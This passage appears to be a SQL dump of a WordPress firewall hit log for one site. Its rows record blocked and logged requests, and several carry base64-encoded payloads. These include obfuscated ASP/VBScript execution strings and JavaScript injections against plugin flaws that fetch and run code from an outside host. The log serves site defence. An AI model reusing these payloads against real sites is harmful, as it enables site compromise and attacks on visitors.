Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W211bWFhc3BfY29tXQ==\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9wbHVzL211bWFhc3AuYXNw\",\"category\":\"sqli\",\"ssl\":0}'),(37920,1570674672.609481,1570674671.801700,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//md5.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Bhc3Nd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9tZDUuYXNw\",\"category\":\"sqli\",\"ssl\":0}'),(37927,1570817862.345582,1570817860.781300,'\0\0\0\0\0\0\0\0\0\0ÿÿÀc',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),(37856,1569949976.353440,1569949974.855300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php','livechat_settings','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpY2Vuc2VFbWFpbF0=\",\"paramValue\":\"Ij48c2NyaXB0ICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FhYWFhYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLywxMTUvKiovLDQ2LypfYWFhYWFhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWEqLywxMTkvKiovLDk3LypfYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhKi8sMTA0LypfYWFhYWFhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhYWFhYWEqLyw0Ny8qKi8sMTA4LypfYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTA4LyoqLyw0Ny8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhKi8sMTA2LypfYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYWFhYWFhID0gX2FhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYWFhYWFhLmxlbmd0aCA+IDMpe19hYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhYWFhYWEub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9hYWFhYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhYWFhYWEucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYWFhYSgwLDApO308L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37756,1569949440.615506,1569949439.379300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhKi8sNTgvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sMTAzLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTAxLypfYWFhYWFhYSovLDExNC8qX2FhYWFhYWEqLyw5OC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE2LypfYWFhYWFhYSovLDEwNC8qX2FhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sNDYvKl9hYWFhYWFhKi8sOTkvKl9hYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sOTcvKl9hYWFhYWFhKi8sMTE0LypfYWFhYWFhYSovLDQ2LypfYWFhYWFhYSovLDEwNi8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYSA9IF9hYWFhYWFhKF9hYWFhYWFhKTtpZihfYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYShfYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYShfYWFhYWFhYSl7IHZhciBfYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37745,1569560818.434898,1569560817.576500,'\0\0\0\0\0\0\0\0\0\0ÿÿõ·¿',0,200,0,0,0,'http://bintara.com.my/?page_id=18','http://Bintara.net/?page_id=18','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3238.0 Safari/537.36','logged:waf','Generic X-Forwarded-For Injection','{\"learningMode\":0,\"failedRules\":\"logged|150\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1gtRm9yd2FyZGVkLUZvcl0=\",\"paramValue\":\"dW5rbm93bg==\",\"path\":\"Lw==\",\"category\":\"bypass\",\"ssl\":0}'),(37746,1569701813.967598,1569701812.081600,'\0\0\0\0\0\0\0\0\0\0ÿÿNðÖ',0,200,0,0,0,'http://www.bintara.com.my/',NULL,'Mozilla/5.0 (compatible; aiHitBot/2.9; +https://www.aihitdata.com/about)','logged:waf','Generic X-Forwarded-For Injection','{\"learningMode\":0,\"failedRules\":\"logged|150\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1gtRm9yd2FyZGVkLUZvcl0=\",\"paramValue\":\"dW5rbm93bg==\",\"path\":\"Lw==\",\"category\":\"bypass\",\"ssl\":0}'),(37747,0.000000,1569810223.301464,'\0\0\0\0\0\0\0\0\0\0ÿÿ¯Žv+',0,302,0,1,0,'https://bintara.com.my/wp-login.php','https://bintara.com.my/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','loginOK',NULL,NULL),(37748,0.000000,1569892717.780303,'\0\0\0\0\0\0\0\0\0\0ÿÿs„«',0,302,0,1,0,'https://bintara.com.my/wp-login.php','https://bintara.com.my/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','loginOK',NULL,NULL),(37749,1569899315.524347,1569899314.361300,'\0\0\0\0\0\0\0\0\0\0ÿÿ/',0,200,0,0,0,'https://bintara.com.my/blog/2018/12/11/logitech-rally/','https://bintara.com.my/blog/2018/12/11/logitech-rally/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99','logged:waf','Watched IP Traffic: 5.8.47.2','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L2Jsb2cvMjAxOC8xMi8xMS9sb2dpdGVjaC1yYWxseS8=\",\"category\":\"logged\",\"ssl\":1}'),(37744,1569530575.007178,1569530574.145600,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦°¸',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=import_csv',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3ZhbHVlXVsxXVswXQ==\",\"paramValue\":\"Ij48c2NyaXB0IHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz0naHR0cHM6Ly9iZXMuYmVsYXRlcmJld2FzdGhlcmUuY29tL2Nvcm4vZmxleC5qcz90cD0xJnY3Jz48L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37750,0.000000,1569921971.097244,'\0\0\0\0\0\0\0\0\0\0ÿÿs„«',0,302,0,1,0,'https://bintara.com.my/wp-login.php','https://bintara.com.my/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','loginOK',NULL,NULL),(37751,0.000000,1569946306.831634,'\0\0\0\0\0\0\0\0\0\0ÿÿE.$',0,200,0,0,0,'https://bintara.com.my/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(37752,1569949456.137116,1569949454.149700,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhKi8sNTgvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sMTAzLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTAxLypfYWFhYWFhYSovLDExNC8qX2FhYWFhYWEqLyw5OC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE2LypfYWFhYWFhYSovLDEwNC8qX2FhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sNDYvKl9hYWFhYWFhKi8sOTkvKl9hYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sOTcvKl9hYWFhYWFhKi8sMTE0LypfYWFhYWFhYSovLDQ2LypfYWFhYWFhYSovLDEwNi8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYSA9IF9hYWFhYWFhKF9hYWFhYWFhKTtpZihfYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYShfYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYShfYWFhYWFhYSl7IHZhciBfYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37754,1569949449.185192,1569949447.548600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37740,1569530067.460522,1569530066.433200,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦°¸',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9vcmJnZHEyMXlvYmFwb2k9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKiovLDExNi8qX3ppZWd3Z2x4M3A0cjJhMSovLDExNi8qKi8sMTEyLyoqLywxMTUvKiovLDU4LypfN3lyOXUyMWZ1M2ZuYzlpKi8sNDcvKiovLDQ3LyoqLyw5OC8qX29yYmdkcTIxeW9iYXBvaSovLDEwMS8qXzd5cjl1MjFmdTNmbmM5aSovLDExNS8qKi8sNDYvKl96aWVnd2dseDNwNHIyYTEqLyw5OC8qKi8sMTAxLyoqLywxMDgvKl9leGczc2Z5NDRjcTh6emYqLyw5Ny8qKi8sMTE2LyoqLywxMDEvKl9vcmJnZHEyMXlvYmFwb2kqLywxMTQvKl96aWVnd2dseDNwNHIyYTEqLyw5OC8qX29yYmdkcTIxeW9iYXBvaSovLDEwMS8qX3ppZWd3Z2x4M3A0cjJhMSovLDExOS8qX2V4ZzNzZnk0NGNxOHp6ZiovLDk3LypfN3lyOXUyMWZ1M2ZuYzlpKi8sMTE1LyoqLywxMTYvKiovLDEwNC8qKi8sMTAxLypfZXhnM3NmeTQ0Y3E4enpmKi8sMTE0LypfZXhnM3NmeTQ0Y3E4enpmKi8sMTAxLypfemllZ3dnbHgzcDRyMmExKi8sNDYvKl96aWVnd2dseDNwNHIyYTEqLyw5OS8qX3ppZWd3Z2x4M3A0cjJhMSovLDExMS8qX29yYmdkcTIxeW9iYXBvaSovLDEwOS8qX3ppZWd3Z2x4M3A0cjJhMSovLDQ3Lypfb3JiZ2RxMjF5b2JhcG9pKi8sMTE2LyoqLywxMTQvKl9vcmJnZHEyMXlvYmFwb2kqLyw5Ny8qKi8sMTEwLypfZXhnM3NmeTQ0Y3E4enpmKi8sMTE1LypfemllZ3dnbHgzcDRyMmExKi8sNDcvKiovLDEwMC8qX2V4ZzNzZnk0NGNxOHp6ZiovLDExMS8qX29yYmdkcTIxeW9iYXBvaSovLDExOS8qX3ppZWd3Z2x4M3A0cjJhMSovLDExMC8qKi8sMTE2LyoqLyw5Ny8qXzd5cjl1MjFmdTNmbmM5aSovLDExMi8qKi8sMTAxLypfZXhnM3NmeTQ0Y3E4enpmKi8sNDYvKl83eXI5dTIxZnUzZm5jOWkqLywxMDYvKl9vcmJnZHEyMXlvYmFwb2kqLywxMTUvKiovLDYzLypfb3JiZ2RxMjF5b2JhcG9pKi8pO3ZhciBfZXhnM3NmeTQ0Y3E4enpmID0gX3ppZWd3Z2x4M3A0cjJhMShfb3JiZ2RxMjF5b2JhcG9pKTtpZihfZXhnM3NmeTQ0Y3E4enpmLmxlbmd0aCA+IDMpe185c29iYmR5M25rajM5dTkoX2V4ZzNzZnk0NGNxOHp6Zik7fSBmdW5jdGlvbiBfemllZ3dnbHgzcDRyMmExKF9vZXdzdTJrbTI5NHl6M3gpeyB2YXIgXzd5cjl1MjFmdTNmbmM5aSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO183eXI5dTIxZnUzZm5jOWkub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9vZXdzdTJrbTI5NHl6M3gsIGZhbHNlICk7Xzd5cjl1MjFmdTNmbmM5aS5zZW5kKCBudWxsICk7cmV0dXJuIF83eXI5dTIxZnUzZm5jOWkucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfOXNvYmJkeTNua2ozOXU5KHRvZG8peyB2YXIgX3BkNDJlMXA0Z3R5eGdweiA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X3BkNDJlMXA0Z3R5eGdweigwLDApO308L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37739,1569529460.798742,1569529459.752000,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦°¸',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=import_csv',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3ZhbHVlXVsxXVswXQ==\",\"paramValue\":\"Ij48c2NyaXB0IHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz0naHR0cHM6Ly9iZXMuYmVsYXRlcmJld2FzdGhlcmUuY29tL2Nvcm4vZmxleC5qcz90cD0xJnY3Jz48L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37738,1569529618.423961,1569529617.517800,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦°¸',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2VtYWlsXQ==\",\"paramValue\":\"PHN2Zy9vbmxvYWQ9ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDMyLDQwLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMDEsMTA4LDEwMSwxMDksMzIsNjEsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDk5LDExNCwxMDEsOTcsMTE2LDEwMSw2OSwxMDgsMTAxLDEwOSwxMDEsMTEwLDExNiw0MCwzOSwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDQxLDU5LDMyLDEwLDksMTAxLDEwOCwxMDEsMTA5LDQ2LDExNiwxMjEsMTEyLDEwMSwzMiw2MSwzMiwzOSwxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDU5LDMyLDEwLDMyLDMyLDMyLDMyLDEwMSwxMDgsMTAxLDEwOSw0NiwxMTUsMTE